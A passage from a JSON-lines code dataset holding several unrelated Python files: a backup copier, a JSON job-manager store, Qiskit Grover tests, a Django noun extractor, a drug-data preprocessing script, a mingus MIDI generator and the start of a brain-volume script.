i in os.listdir(sourcePath):\n        s = sourcePath + i\n        if os.path.isfile(s):\n            if not os.path.exists(distPath + i):\n                writeToLog(s)\n                shutil.copy2(sourcePath + '\\\\' + i, distPath)\n        else:\n            if not os.path.exists(distPath + i):\n                os.mkdir(distPath + i)\n                copyFiles(s + \"\\\\\", distPath + i + '\\\\')\n            else:\n                copyFiles(s + \"\\\\\", distPath + i + '\\\\')\n\n\ndef createLogFile(logPath):\n    f = open(logPath + 'Backup Moving Log file.txt', 'a')\n    f.write(\n        '\\n' + '--- Start BackUp copy in ' + str(datetime.now().strftime('%d-%m-%Y %H:%M:%S')) + ' ---' + '\\n' + '\\n')\n    f.close()\n\n\ndef writeToLog(copiedFile):\n    f = open(logPath + 'Backup Moving Log file.txt', 'a')\n    f.write(str(datetime.now().strftime('%H:%M:%S')) + ' ' + copiedFile + '\\n')\n    f.close()\n\n\ndef writeErrorToLog(errorName):\n    f = open(logPath + 'Backup Moving Log file.txt', 'a')\n    f.write(str(datetime.now().strftime('%H:%M:%S')) + ' ' + errorName + '\\n')\n    f.close()\n\n\ndef endLog():\n    f = open(logPath + 'Backup Moving Log file.txt', 'a')\n    f.write(\n        '\\n' + '--- End BackUp copy in ' + str(datetime.now().strftime('%d-%m-%Y %H:%M:%S')) + ' ---' + '\\n' + '\\n')\n    f.close()\n\nif __name__ == \"__main__\":\n    checkForRequirements()\n    sourcePath, distPath, logPath = getPathOfSourceFiles()\n    checkEnoughSpace(checkFreeSpaceOnDisk(distPath), checkCommonFilesSize(sourcePath, distPath))\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"244753067","text":"\"\"\"Implementation of a model that stores the data in a JSON file.\n\"\"\"\nimport os.path\nimport json\nimport copy\nimport shutil\nimport threading\nimport logging\n\nimport lockfile\n\nfrom common import *\nimport fix_path\nimport dist_job_mgr.model as model\nimport dist_job_mgr.mem_model as mem_model\n\nclass JsonModelError(Exception):\n    pass\n\nlogger = logging.getLogger(__name__)\n\ndef pool_to_json(pool):\n    p = {\n        \"name\":pool.name,\n        \"node_names\":[n for n in pool.nodes_by_name.keys()],\n        \"available_set\":[n for n in pool.available_set]\n    }\n    return p\n\ndef 
json_to_pool(model, incarnation, data):\n p = mem_model.StaticNodePool(model, data[\"name\"])\n p.incarnation = incarnation\n return p\n\ndef node_to_json(node):\n return {\n \"name\":node.name,\n \"os_username\": node.os_username,\n \"worker_port\": node.worker_port,\n \"is_temporary\": node.is_temporary(),\n \"hostname\": node.hostname,\n \"public_ip\":node.public_ip,\n \"private_ip\":node.private_ip,\n \"pool\":node.pool.name if node.pool else None,\n \"job_id\":node.job.job_id if node.job else None,\n \"task_id\":node.task.task_id if node.task else None\n }\n\n\ndef json_to_node(model, incarnation, data):\n n = mem_model.Node(model, data[\"name\"], data[\"os_username\"],\n data[\"worker_port\"], data[\"is_temporary\"],\n hostname=data[\"hostname\"],\n public_ip=data[\"public_ip\"],\n private_ip=data[\"private_ip\"])\n n.incarnation = incarnation\n return n\n\n\ndef task_to_json(task):\n return {\n \"task_id\":task.task_id,\n \"name\":task.name,\n \"task_type\":task.task_type,\n \"node_name\":task.node_name,\n \"description\":task.description,\n \"result_status\":task.result_status\n }\n\ndef json_to_task(model, incarnation, job, data):\n task = mem_model.Task(model, data[\"task_id\"], data[\"name\"],\n job, data[\"task_type\"], data[\"node_name\"],\n data[\"description\"])\n task.result_status = data[\"result_status\"]\n task.incarnation = incarnation\n return task\n\ndef job_to_json(job):\n return {\n \"job_id\": job.job_id,\n \"name\": job.name,\n \"job_type\":job.job_type,\n \"description\":job.description,\n \"coordinator_lockfile\":job.coordinator_lockfile,\n \"pool\":job.node_pool.name if job.node_pool else None,\n \"nodes\":[node.name for node in job.current_nodes],\n \"completion_status\":job.completion_status,\n \"completion_comment\":job.completion_comment,\n \"num_active_tasks\":job.num_active_tasks,\n \"tasks\":[task_to_json(task) for task in job.tasks]\n }\n\ndef json_to_job(model, incarnation, data):\n j = mem_model.Job(incarnation, data[\"job_id\"], data[\"name\"],\n data[\"job_type\"], data[\"description\"],\n data[\"coordinator_lockfile\"])\n j.completion_status = data[\"completion_status\"]\n j.completion_comment = data[\"completion_comment\"]\n j.num_active_tasks = data[\"num_active_tasks\"]\n j.tasks = [json_to_task(model, incarnation, j, task_data) for task_data in\n data[\"tasks\"]]\n j.task_names = set([task.name for task in j.tasks])\n return j\n\ndef jobdb_to_json(jobdb):\n jobs = {}\n for (k, job) in jobdb.jobs_by_id.items():\n jobs[k] = job_to_json(job)\n return {\n \"jobs_by_id\": jobs,\n \"next_id_for_name\": copy.deepcopy(jobdb.next_id_for_name)\n }\n\ndef json_to_jobdb(model, incarnation, data):\n job_db = mem_model.JobDb()\n job_db.next_id_for_name = data[\"next_id_for_name\"]\n for (k, j) in data[\"jobs_by_id\"].items():\n job_db.jobs_by_id[k] = json_to_job(model, incarnation, j)\n # fixup the jobs_by_name map\n for job in job_db.jobs_by_id.values():\n if job_db.jobs_by_name.has_key(job.name):\n job_db.jobs_by_name[job.name].append(job)\n else:\n job_db.jobs_by_name[job.name] = [job,]\n return job_db\n\n \ndef json_to_state(model, data):\n state = State()\n state.incarnation = data[\"incarnation\"]\n pools_data = data[\"pools\"]\n for (k, p) in pools_data.items():\n state.pools[k] = json_to_pool(model, state.incarnation, p)\n nodes_data = data[\"nodes\"]\n for node in nodes_data.values():\n state.all_nodes.add_node(json_to_node(model, state.incarnation, node))\n jobs_data = data[\"jobs\"]\n state.jobs = json_to_jobdb(model, state.incarnation,\n 
jobs_data)\n # fixup node references\n for node in state.all_nodes.by_name.values():\n data = nodes_data[node.name]\n pool_name = data[\"pool\"]\n if pool_name:\n node.pool = state.pools[pool_name]\n job_id = data[\"job_id\"]\n if job_id:\n node.job = state.jobs.jobs_by_id[job_id]\n # fixup pool references\n for pool in state.pools.values():\n data = pools_data[pool.name]\n pool.available_set = set(data[\"available_set\"])\n for node_name in data[\"node_names\"]:\n pool.nodes_by_name[node_name] = state.all_nodes.by_name[node_name]\n # fixup job references\n for job in state.jobs.jobs_by_id.values():\n data = jobs_data[\"jobs_by_id\"][job.job_id]\n if data[\"pool\"]:\n job.node_pool = state.pools[data[\"pool\"]]\n for node_name in data[\"nodes\"]:\n job.current_nodes.append(state.all_nodes.by_name[node_name])\n for task in job.tasks:\n if task.node_name and task.result_status==None:\n node = state.all_nodes.by_name[task.node_name]\n node.task = task\n return state\n\n\nclass State(mem_model.State):\n def __init__(self):\n mem_model.State.__init__(self)\n\n def to_json(self):\n data = {}\n assert isinstance(self.incarnation, int), \"Incarnation value %s is not an int\" % self.incarnation\n data[\"incarnation\"] = self.incarnation\n pools = {}\n for (k, p) in self.pools.items():\n pools[k] = pool_to_json(p)\n data[\"pools\"] = pools\n nodes = {}\n for (k, n) in self.all_nodes.by_name.items():\n nodes[k] = node_to_json(n)\n data[\"nodes\"] = nodes\n data[\"jobs\"] = jobdb_to_json(self.jobs)\n return data\n\nclass SharedLock(object):\n def __init__(self):\n self.lock = threading.Lock()\n\n def acquire(self):\n self.lock.acquire()\n\n def release(self):\n self.lock.release()\n\n def __deepcopy__(self, memo):\n c = SharedLock()\n c.lock = self.lock\n return c\n \n@apply_interface_contracts(model.ModelAdapterBase)\nclass ModelAdapter(mem_model.ModelAdapter):\n def __init__(self, config_path):\n self.state = State()\n self.prev_state = None\n self.db_file_path = os.path.join(config_path, \"djm_data.json\")\n self._is_in_transaction = False\n self.incarnation_hwm = 0\n self.file_lock = lockfile.FileLock(self.db_file_path)\n self.lock = SharedLock()\n\n def create_database(self):\n if os.path.exists(self.db_file_path):\n raise JsonModelError(\"Cannot create database - database file %s already exists\" %\n self.db_file_path)\n with open(self.db_file_path, \"wb\") as f:\n json.dump(self.state.to_json(), f)\n\n def begin_transaction(self):\n self.lock.acquire()\n assert not self.is_in_transaction()\n self.file_lock.acquire(timeout=500)\n with open(self.db_file_path, \"rb\") as f:\n data = json.load(f)\n self.state = json_to_state(self, data)\n self.state.inc_incarnation(self)\n self._is_in_transaction = True\n\n def commit_transaction(self):\n assert self.is_in_transaction()\n self.state.unlock_all()\n shutil.copy(self.db_file_path, self.db_file_path + \".prev\")\n with open(self.db_file_path, \"wb\") as f:\n json.dump(self.state.to_json(), f, indent=2)\n self.file_lock.release()\n self._is_in_transaction = False\n logger.debug(\"Committed transaction %d\" % self.state.incarnation)\n self.lock.release()\n\n def abort_transaction(self):\n assert self.is_in_transaction()\n self.state = None\n self.file_lock.release()\n self._is_in_transaction = False\n self.lock.release()\n\n def is_in_transaction(self):\n return self._is_in_transaction\n\n def _get_incarnation(self):\n return self.state.incarnation if self.state else 
-1\n","sub_path":"dist_job_mgr/json_model.py","file_name":"json_model.py","file_ext":"py","file_size_in_byte":8511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"261986285","text":"# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2018, 2020.\n#\n# This code is licensed under the Apache License, Version 2.0. You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\" test Grover \"\"\"\n\nimport unittest\n\nfrom test.python.algorithms import QiskitAlgorithmsTestCase\nfrom qiskit import BasicAer, QuantumCircuit\nfrom qiskit.utils import QuantumInstance\nfrom qiskit.algorithms import Grover\nfrom qiskit.circuit.library import GroverOperator\nfrom qiskit.quantum_info import Operator, Statevector\n\n\nclass TestGroverConstructor(QiskitAlgorithmsTestCase):\n \"\"\"Test for the constructor of Grover\"\"\"\n\n def setUp(self):\n super().setUp()\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n self._expected_grover_op = GroverOperator(oracle=oracle)\n\n def test_oracle_quantumcircuit(self):\n \"\"\"Test QuantumCircuit oracle\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n grover = Grover(oracle=oracle, good_state=[\"11\"])\n grover_op = grover._grover_operator\n self.assertTrue(Operator(grover_op).equiv(Operator(self._expected_grover_op)))\n\n def test_oracle_statevector(self):\n \"\"\"Test StateVector oracle\"\"\"\n mark_state = Statevector.from_label('11')\n grover = Grover(oracle=mark_state, good_state=['11'])\n grover_op = grover._grover_operator\n self.assertTrue(Operator(grover_op).equiv(Operator(self._expected_grover_op)))\n\n def test_state_preparation_quantumcircuit(self):\n \"\"\"Test QuantumCircuit state_preparation\"\"\"\n state_preparation = QuantumCircuit(2)\n state_preparation.h(0)\n oracle = QuantumCircuit(3)\n oracle.cz(0, 1)\n grover = Grover(oracle=oracle, state_preparation=state_preparation,\n good_state=[\"011\"])\n grover_op = grover._grover_operator\n expected_grover_op = GroverOperator(oracle, state_preparation=state_preparation)\n self.assertTrue(Operator(grover_op).equiv(Operator(expected_grover_op)))\n\n def test_is_good_state_list(self):\n \"\"\"Test List is_good_state\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n is_good_state = [\"11\", \"00\"]\n grover = Grover(oracle=oracle, good_state=is_good_state)\n self.assertListEqual(grover._is_good_state, [\"11\", \"00\"])\n\n def test_is_good_state_statevector(self):\n \"\"\"Test StateVector is_good_state\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n is_good_state = Statevector.from_label('11')\n grover = Grover(oracle=oracle, good_state=is_good_state)\n self.assertTrue(grover._is_good_state.equiv(Statevector.from_label('11')))\n\n def test_grover_operator(self):\n \"\"\"Test GroverOperator\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n grover_op = GroverOperator(oracle)\n grover = Grover(oracle=grover_op.oracle,\n grover_operator=grover_op, good_state=[\"11\"])\n grover_op = grover._grover_operator\n self.assertTrue(Operator(grover_op).equiv(Operator(self._expected_grover_op)))\n\n\nclass TestGroverPublicMethods(QiskitAlgorithmsTestCase):\n \"\"\"Test for the public methods of Grover\"\"\"\n\n def test_is_good_state(self):\n 
\"\"\"Test is_good_state\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n list_str_good_state = [\"11\"]\n grover = Grover(oracle=oracle, good_state=list_str_good_state)\n self.assertTrue(grover.is_good_state(\"11\"))\n\n statevector_good_state = Statevector.from_label('11')\n grover = Grover(oracle=oracle, good_state=statevector_good_state)\n self.assertTrue(grover.is_good_state(\"11\"))\n\n list_int_good_state = [0, 1]\n grover = Grover(oracle=oracle, good_state=list_int_good_state)\n self.assertTrue(grover.is_good_state(\"11\"))\n\n def _callable_good_state(bitstr):\n if bitstr == \"11\":\n return True, bitstr\n else:\n return False, bitstr\n grover = Grover(oracle=oracle, good_state=_callable_good_state)\n self.assertTrue(grover.is_good_state(\"11\"))\n\n def test_construct_circuit(self):\n \"\"\"Test construct_circuit\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n grover = Grover(oracle=oracle, good_state=[\"11\"])\n constructed = grover.construct_circuit(1)\n grover_op = GroverOperator(oracle)\n expected = QuantumCircuit(2)\n expected.compose(grover_op.state_preparation, inplace=True)\n expected.compose(grover_op, inplace=True)\n self.assertTrue(Operator(constructed).equiv(Operator(expected)))\n\n def test_grover_operator_getter(self):\n \"\"\"Test the getter of grover_operator\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n grover = Grover(oracle=oracle, good_state=[\"11\"])\n constructed = grover.grover_operator\n expected = GroverOperator(oracle)\n self.assertTrue(Operator(constructed).equiv(Operator(expected)))\n\n\nclass TestGroverFunctionality(QiskitAlgorithmsTestCase):\n \"\"\"Test for the functionality of Grover\"\"\"\n\n def setUp(self):\n super().setUp()\n self._oracle = Statevector.from_label('111')\n self._expected_grover_op = GroverOperator(oracle=self._oracle)\n self._expected = QuantumCircuit(self._expected_grover_op.num_qubits)\n self._expected.compose(self._expected_grover_op.state_preparation, inplace=True)\n self._expected.compose(self._expected_grover_op.power(2), inplace=True)\n backend = BasicAer.get_backend('statevector_simulator')\n self._sv = QuantumInstance(backend)\n\n def test_iterations(self):\n \"\"\"Test the iterations argument\"\"\"\n grover = Grover(oracle=self._oracle, good_state=['111'], iterations=2)\n ret = grover.run(self._sv)\n self.assertTrue(Operator(ret['circuit']).equiv(Operator(self._expected)))\n\n grover = Grover(oracle=self._oracle, good_state=['111'], iterations=[1, 2, 3])\n ret = grover.run(self._sv)\n self.assertTrue(ret.oracle_evaluation)\n self.assertIn(ret.top_measurement, ['111'])\n\n\nclass TestGroverExecution(QiskitAlgorithmsTestCase):\n \"\"\"Test for the execution of Grover\"\"\"\n\n def setUp(self):\n super().setUp()\n backend = BasicAer.get_backend('qasm_simulator')\n self._qasm = QuantumInstance(backend)\n\n def test_run_circuit_oracle(self):\n \"\"\"Test execution with a quantum circuit oracle\"\"\"\n oracle = QuantumCircuit(2)\n oracle.cz(0, 1)\n list_good_state = [\"11\"]\n grover = Grover(oracle=oracle, good_state=list_good_state)\n ret = grover.run(self._qasm)\n self.assertIn(ret['top_measurement'], list_good_state)\n\n def test_run_state_vector_oracle(self):\n \"\"\"Test execution with a state vector oracle\"\"\"\n mark_state = Statevector.from_label('11')\n grover = Grover(oracle=mark_state, good_state=['11'])\n ret = grover.run(self._qasm)\n self.assertIn(ret['top_measurement'], ['11'])\n\n def test_run_grover_operator_oracle(self):\n \"\"\"Test execution with a grover operator oracle\"\"\"\n 
oracle = QuantumCircuit(2)\n        oracle.cz(0, 1)\n        grover_op = GroverOperator(oracle)\n        grover = Grover(oracle=grover_op.oracle,\n                        grover_operator=grover_op, good_state=[\"11\"])\n        ret = grover.run(self._qasm)\n        self.assertIn(ret['top_measurement'], ['11'])\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"test/python/algorithms/test_grover.py","file_name":"test_grover.py","file_ext":"py","file_size_in_byte":7806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"281279311","text":"from django.shortcuts import render, redirect\nimport sys \nfrom nltk.tag import tnt\nfrom nltk.corpus import indian\nimport nltk\nfrom nltk.tree import Tree\nfrom langdetect import detect\n\n# Create your views here.\ndef index(request):\n    return render(request, 'home.html')\n\ndef output(request):\n    text = request.POST.get('text')\n    \n    ######################### functions for information extraction in hindi ##########\n    def hindi_model():\n        train_data = indian.tagged_sents('hindi.pos')\n        tnt_pos_tagger = tnt.TnT()\n        tnt_pos_tagger.train(train_data)\n        return tnt_pos_tagger\n\n\n    def get_keywords(pos):\n        # chunk one or more consecutive noun tags into an NP\n        grammar = r\"\"\"NP:{<NN.*>+}\"\"\"\n        chunkParser = nltk.RegexpParser(grammar)\n        chunked = chunkParser.parse(pos)\n        continuous_chunk = set()\n        current_chunk = []\n        for i in chunked:\n            if type(i) == Tree:\n                current_chunk.append(\" \".join([token for token, pos in i.leaves()]))\n            elif current_chunk:\n                named_entity = \" \".join(current_chunk)\n                if named_entity not in continuous_chunk:\n                    continuous_chunk.add(named_entity)\n                current_chunk = []\n            else:\n                continue\n        return (continuous_chunk)\n\n    ######################## end for hindi #################\n\n    ########### functions for English #################\n\n    def extract_eng(text):\n        output = [word for (word, pos) in nltk.pos_tag(nltk.word_tokenize(text)) if pos[0] == 'N']\n        return output\n    \n    # sample input for hindi language\n    # text = \"इराक के विदेश मंत्री ने अमरीका के उस प्रस्ताव का मजाक उड़ाया है , जिसमें अमरीका ने संयुक्त राष्ट्र के प्रतिबंधों को इराकी नागरिकों के लिए कम हानिकारक बनाने के लिए कहा है ।\"\n    ########### end for english ################\n    d_flag = detect(text)\n    if d_flag == 'en':\n        result = extract_eng(text)\n        return render(request, 'home.html', {'text': result})\n    elif d_flag == 'hi':\n        model = hindi_model()\n        new_tagged = model.tag(nltk.word_tokenize(text))\n        result = list(get_keywords(new_tagged))\n        return render(request, 'home.html', {'text': result})\n    \n    result = \"Cannot detect your language; please try Hindi or English.\"\n    return render(request, 'home.html', {'text': result})","sub_path":"Complete Project With UI/Extract_Information/extract/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"654486719","text":"import os\nimport errno\nfrom pubchempy import *\nimport pandas as pd\nimport math\nimport csv\n\nfrom feature_clean import clean, clean_padel, remove_all_same\nfrom feature_encode import encode, join\n\norigin_path = '../../'\n\ndef create_folders():\n    try:\n        os.makedirs(origin_path + './data/results')\n        os.makedirs(origin_path + './results')\n    except OSError as exception:\n        if exception.errno != errno.EEXIST:\n            raise\n
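\n# NOTE: on Python 3.2+ the errno check above can be written more simply as os.makedirs(path, exist_ok=True).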
\n\ndef generate_smiles(_origin_path, _drug_list_df):\n    cids = _drug_list_df.pubchem_id\n    names = _drug_list_df.name\n\n    isomeric_file = open(_origin_path + 'data/SMiLES/isomeric.smi', 'w')\n    canonical_file = open(_origin_path + 'data/SMiLES/canonical.smi', 'w')\n\n    for cid, name in zip(cids, names):\n        if not(math.isnan(cid)):\n            c = Compound.from_cid(int(cid))\n            print(c.isomeric_smiles + ' ' + name)\n            isomeric_file.write(c.isomeric_smiles + ' ' + name + '\\n')\n            canonical_file.write(c.canonical_smiles + ' ' + name + '\\n')\n\n    isomeric_file.close()\n    canonical_file.close()\n\n\nif __name__ == \"__main__\":\n    drug_list_df = pd.read_csv(origin_path + 'data/journal.pone.0061318.s004.CSV', ';')\n    gdsc_df = pd.read_csv(origin_path + 'data/GSDC/1.1/gdsc_manova_input_w1_1.csv', ';')\n    gdsc11_df = pd.read_csv(origin_path + 'data/GSDC/2/gdsc_manova_input_w2.csv', ';')\n    gdsc11_df = gdsc11_df.set_index(gdsc11_df.ix[:, 0])\n    orig_df = gdsc_df\n    gdsc_df = gdsc_df[gdsc_df.columns[:gdsc_df.columns.get_loc(\"Erlotinib_ALPHA\")]]\n\n    gSpanFP_df = pd.read_csv(origin_path + 'data/gSpan/gSpanRows.csv', ';')\n    gSpanFP_df.drop(gSpanFP_df.columns[0], axis=1, inplace=True)\n    gSpanFP_df.to_csv(origin_path + 'data/results/drug_feature_set_TEST_GSPAN.csv', sep=\";\", index=False)\n    #print(gSpanFP_df)\n    #print(gdsc_df.columns.get_loc(\"Erlotinib_ALPHA\"))\n\n    create_folders()\n    generate_smiles(origin_path, drug_list_df)\n\n    gdsc_df = clean(origin_path, gdsc_df)\n\n    gdsc_df.to_csv(origin_path + 'data/results/teste.csv', sep=\";\", index=False)\n    assert (len(gdsc_df.index) == 579)\n    #assert (len(gdsc_df.index) == 618)\n    #print(gdsc_df)\n    gdsc_df.to_csv(origin_path + 'data/results/result.csv', sep=\";\", index=False)\n\n    padel_1d_df = pd.read_csv(origin_path + 'data/padel-results.csv', ';')\n    padel_fingerprint_df = pd.read_csv(origin_path + 'data//padel-results-fingerprints.csv', ';')\n    drug_result_df = clean_padel(origin_path, padel_1d_df, padel_fingerprint_df)\n    drug_result_df.to_csv(origin_path + 'data/results/drug_feature_set.csv', sep=\";\", index=False)\n\n    gSpanFP_df = gSpanFP_df.drop(gSpanFP_df.columns[1], axis=1)\n    drug_result_df = pd.concat([drug_result_df, gSpanFP_df], axis=1)\n    #drug_result_df_test.to_csv(origin_path + 'data/results/drug_feature_set_TEST_GSPAN.csv', sep=\";\", index=False)\n\n    copy_df = gdsc_df.copy()\n\n    cell_encoded_df = encode(origin_path, gdsc_df)\n    cell_encoded_df.to_csv(origin_path + 'data/results/cell_feature_set.csv', sep=\";\", index=False)\n\n    final_rows, final_rows_test = join(cell_encoded_df, drug_result_df, copy_df, gdsc11_df)\n    #print(final_rows['WT1_wt'])\n    columns_same = remove_all_same(final_rows)\n\n    final_rows_test.drop(columns_same, axis=1, inplace=True)\n\n    #remove_all_same(final_rows_test)\n\n\n\n    final_no_ic50 = final_rows[final_rows.isnull().any(axis=1)]\n    final_no_ic50 = final_rows.loc[final_rows['ic50'].isnull()]\n    final_rows = final_rows[final_rows.notnull().all(axis=1)]\n    #final_no_ic50.to_csv(origin_path + 'data/results/final_no_ic50.csv', sep=\";\", index=False)\n    #print(final_rows['WT1_wt'])\n    #final_rows.to_csv(origin_path + 'data/results/final.csv', sep=\";\", index=False)\n    final_rows_test.to_csv(origin_path + 'data/results/final_test_gSpan.csv', sep=\";\", index=False)\n\n    #final_no_ic50_gSpan = final_rows_gspan[final_rows_gspan.isnull().any(axis=1)]\n    #final_no_ic50_gSpan = final_rows_gspan.loc[final_rows_gspan['ic50'].isnull()]\n    #final_rows_gspan = final_rows_gspan[final_rows_gspan.notnull().all(axis=1)]\n    final_no_ic50.to_csv(origin_path + 'data/results/final_no_ic50_gSpan.csv', sep=\";\", index=False)\n    #print(final_rows['WT1_wt'])\n    final_rows.to_csv(origin_path + 'data/results/final_gSpan.csv', sep=\";\", index=False)
","sub_path":"src/data_cleaning/data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"387667775","text":"\"\"\"This file contains the functions for service4 Implementation 1 & 2.\"\"\"\n\n# Imports --------------------------------------------------------------\n\nfrom mingus.containers import Bar\nfrom mingus.midi import midi_file_out\nfrom mingus.extra.lilypond import to_png, from_Bar\n\n# Functions ------------------------------------------------------------\n\n\ndef generate_key_offset(input_key, key_offset_dictionary):\n    \"\"\" A function which takes a given user's key, and offsets it to the key\n    of C chromatic.\n\n    We add our key_offset to the current pitch value.\n    We return a transposed index position (from the key of C chromatic).\n\n    Keyword Arguments:\n    input_key: The key of our musical phrase, set by the user in\n    service #1.\n\n    key_offset_dictionary: A mapping of each musical key in relation to\n    key of C. This should be in the form of a python dictionary.\n    \"\"\"\n\n    return key_offset_dictionary.get(input_key)\n
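\n# A minimal sketch of the expected mapping (assumed here, not defined in this file): note names mapped to semitone offsets relative to C,\n# e.g. key_offset_dictionary = {\"C\": 0, \"C#\": 1, \"D\": 2, ..., \"B\": 11},\n# so generate_key_offset(\"D\", key_offset_dictionary) would return 2.\n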
\n# Execute Code ---------------------------------------------------------\n\n\noutput_key = \"C\" # From Service #1\noutput_time_signature = 4, 4 # From Service #1\n\n# Create new bar.\n\noutput_bar = Bar(output_key, output_time_signature)\n\n# Pull a note pitch from service #2.\n\nfirst_note_pitch = \"C\"\n\n# Pull a note length from service #3.\n\nfirst_note_length = 4\n\n# While our output bar is not full, we will keep trying to add notes to it.\n# is_full() returns False if there is room in this Bar for another Note, True otherwise.\n\nwhile not output_bar.is_full():\n    # We try and add the note to our bar.\n\n    # If note is rest, we call function place_rest().\n\n    if first_note_pitch == \"r\":\n        output_bar.place_rest(first_note_length)\n\n    # If note is note, we call function place_notes().\n\n    else:\n        output_bar.place_notes(first_note_pitch, first_note_length)\n\n    # Poll API for another note.\n    # Rinse and repeat until bar is full.\n\n    # break # Temporary break statement.\n\n# Transpose output bar to a given user key.\n\nkey_to_transpose = 5 # From generate key offset function.\ntranspose_up_or_down = True # True is up, False is down. From Service #1\n\noutput_bar.transpose(str(key_to_transpose), transpose_up_or_down)\n\n# Save as MIDI\n\noutput_beats_per_minute = 120 # From service #1\n\nfile_name = \"josh-test-midi-file\" # From service #1\nmidi_file_suffix = file_name + \"-mélodie.mid\"\nmidi_save_location = \"midi_output/\" + midi_file_suffix\n\nmidi_file_out.write_Bar(midi_save_location, output_bar,\n                        output_beats_per_minute)\n\n\n\"\"\" lilypond_string = from_Bar(output_bar, showkey=True, showtime=True)\n\n# This feature will only work on a linux machine.\n# Save as lilypond string.\n\npng_file_suffix = file_name + \"-mélodie.png\"\npng_save_location = \"png_output/\" + png_file_suffix\n\nto_png(lilypond_string, png_file_suffix) # Exports lilypond string to png.\n\"\"\"\n\n\n# Deprecated Functions -------------------------------------------------\n\n\ndef transpose_pitch(raw_note_pitch, transposed_key_value=0):\n    \"\"\" This function takes a raw note pitch and our transposed key value,\n    and will transpose the output accordingly, adding a new octave flag if\n    necessary.\n\n    - Check to see if the raw note pitch is a musical note, or a rest.\n    - Check if our value is out of bounds.\n    - Transpose objects needing no octave flag.\n    - Transpose objects needing a lower octave flag.\n    - Transpose objects needing a higher octave flag.\n    - Return our transposed note pitch.\n\n    Keyword Arguments:\n    raw_note_pitch: This is the randomly generated note pitch from\n    service #2.\n\n    transposed_key_value: This is the transposed key value, AKA the\n    output from the function in service #1 - 'generate_key_offset'. This\n    defaults to 0 - the key of C chromatic.\n    \"\"\"\n    transposed_ova = \"\"\n\n    if raw_note_pitch == \"r\":\n        transposed_pitch = \"r\"\n\n    elif raw_note_pitch < 1 or raw_note_pitch > 13:\n        raise ValueError(\"You should enter a value between 1 and 13.\")\n\n    # If raw note pitch is between 1 and 12, we don't add an octave flag.\n\n    elif 1 <= (raw_note_pitch + transposed_key_value) <= 12:\n        transposed_pitch = raw_note_pitch + transposed_key_value\n\n    # If note pitch is transposed lower than our pitch range, add -1 ova flag.\n\n    elif (raw_note_pitch + transposed_key_value) < 1:\n        transposed_pitch = raw_note_pitch + transposed_key_value + 12\n        transposed_ova = \",\"\n\n    # If note pitch is transposed higher than our pitch range, add +1 ova flag.\n\n    elif raw_note_pitch + transposed_key_value > 12:\n        transposed_pitch = raw_note_pitch + transposed_key_value - 12\n        transposed_ova = \"'\"\n\n    else:\n        raise TypeError(\"unexpected raw_note_pitch: {!r}\".format(raw_note_pitch))\n\n    return transposed_pitch, transposed_ova\n","sub_path":"src/service4/service4.py","file_name":"service4.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"145445932","text":"import os\r\nimport numpy as np\r\nimport nibabel as nib\r\nimport pandas as pd\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport glob\r\nimport csv\r\nfrom scipy.stats import ttest_ind\r\nfrom statsmodels.stats.multitest import multipletests\r\nfrom pathlib import Path\r\nimport numpy_indexed as npi\r\nfrom functions import remap_3D\r\nfrom functions import save_image\r\nfrom dipy.align.imwarp import SymmetricDiffeomorphicRegistration\r\nfrom dipy.align.imwarp import DiffeomorphicMap\r\nfrom dipy.align.metrics import CCMetric\r\nfrom compress_pickle import dump, load\r\nimport pathlib\r\nimport seaborn as sns\r\n\r\n# ce mi mice\r\n# WT30, noWT30, selectively noWT30\r\n\r\n\r\n## Function to compute 
volumes for image\r\ndef image2volumetable(image_path):\r\n\r\n\r\n # Compute voxel numbers and volumes and output to table\r\n mouse_mask_image = nib.load(image_path)\r\n mouse_mask_image_array = mouse_mask_image.get_fdata()\r\n [mouse_volume_integer, mouse_voxel_number] = np.unique(np.int64(np.round(mouse_mask_image_array)),\r\n return_counts=True)\r\n\r\n # get voxel volume\r\n # voxel_volume = np.linalg.det(mouse_mask_image.get_qform())\r\n voxel_volume = np.prod(mouse_mask_image.header['pixdim'][1:4]) # should be in mm^3\r\n\r\n mouse_volume = mouse_voxel_number * voxel_volume\r\n mouse_table_reference = pd.DataFrame(\r\n {'Mouse': 'allen', 'VolumeInteger': mouse_volume_integer, 'VoxelNumber': mouse_voxel_number,\r\n 'Volume': mouse_volume})\r\n\r\n # Remove later\r\n VTA_volume = mouse_voxel_number[mouse_volume_integer == 1241]\r\n print(f'Image path = {image_path}, while VTA volume is {VTA_volume}')\r\n\r\n # print number of nonzero volumes\r\n print(mouse_table_reference.shape[0])\r\n print(np.sum(mouse_table_reference['Volume'] != 0))\r\n print(np.sum(mouse_table_reference['Volume'][mouse_table_reference['VolumeInteger'] != 0]))\r\n\r\n # Attach parent path to volumes to table - volumes which are not in structure graph are 